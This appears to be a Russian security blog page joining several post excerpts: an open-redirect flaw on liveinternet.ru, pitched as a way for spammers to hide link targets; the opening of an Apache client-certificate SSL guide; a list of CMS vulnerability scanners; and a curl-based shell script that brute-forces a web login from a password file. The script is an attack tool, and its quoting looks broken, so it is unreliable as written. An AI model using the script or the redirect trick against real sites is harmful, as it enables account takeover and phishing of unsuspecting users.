Обнаружил уязвимость на достаточно известном в рунете ресурсе www.liveinternet.ru. Заключается в том что можно отправить пользователя по необходимой нам ссылке, ссылаясь как бы на этот ресурс. Примерно так же как и на сервисах сокращения ссылок. Но здесь уязвимость интересна в первую очередь тем, что можно скрыть истиный адрес ресурса на который ссылаются, что немаловажно например для спамера или проведения атаки на браузер. Пользователь видит адрес, который вроде бы ему знаком и переходит.
Например:
http://www.liveinternet.ru/click?1113984360/
1113984360 – это ip адрес 66.102.13.104 (google.com) в десятичном представлении.
Странно что спамеры еще не используют этот трюк.
Исходные данные:
OC – FreeBSD или Linux, в наличии должен быть openssl
Веб-сервер – Apache 2.2 + mod_ssl (http://test.lan)
Необходимо:
Настроить SSL – издать сертификаты, настроить веб-сервер
При доступе к определенной директории веб-сервер должен запрашивать авторизацию по сертификату клиента.
Исходим из того что веб-сервер корректно установлен, у хоста есть полное FQDN и он корректно резолвится и доступен извне по портам 80/tcp и 443/tcp.
В первую очередь необходимо будет:
1) Настроить свой CA (Certificate Authority) для издания сертификатов веб-сервера и клиентов.
2) Сгенерировать ключ и сертификат веб-сервера
3) Сгенерировать и импортировать ключи и сертификаты веб-клиентов.
Приступим:
Read the rest of this entry »
Как бы не были сильны различные сканеры веб-приложений, например Webinspect и прочие, конкретные сканеры под конкретные движки знают свое дело куда лучше.
Немного полазив по вебу нашел несколько:
Сканер уязвимостей Wordpress – http://blogsecurity.net/wordpress/tools/wp-scanner
Сканер уязвимостей Drupal – http://raz0r.name/releases/drupal-vulnerability-scanner/
Сканер уязвимостей Joomla – http://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project
Попробовал все три. Результаты понравились. Рекомендую.
Авторизация производится методом POST после успешной авторизации сервер меняет куки.
Условия заданы – приступим:
#!/bin/sh /*стандартный заголовок*/
# для задания файла паролей используйте команду > sh наш_скрипт файл_паролей
if [ -z $1 ]; then
echo -e "\n\t Использование: $0 password file"
exit 1;
fi
PASSWORDS='/bin/cat $1'
USER=admin
# если требуется кука
COOKIE1="blabla=blablabla;" /*измените на то что вам необходимо*/
CMD="/usr/bin/curl \
-b $COOKIE1 \
-d user=$USER \
-c cookies.txt \ /*а сюда упадут куки после удачной авторизации*/
--url http://localhost/login.php" /*путь к файлу паролей*/
for PASS in $PASSWORDS; do
# формируем необходимые заголовки
'$CMD \
-H 'User-Agent: Mozilla/4.0' \
-H 'Host: localhost' \
-d passwd=$PASS'
# проверим не угадан ли пароль
RES='grep -v $COOKIE cookies.txt'
if [ -n '$RES' ]; then
echo -e "found $RES with $USER : $PASS\n";
exit 0;
fi
done
Как то вот так..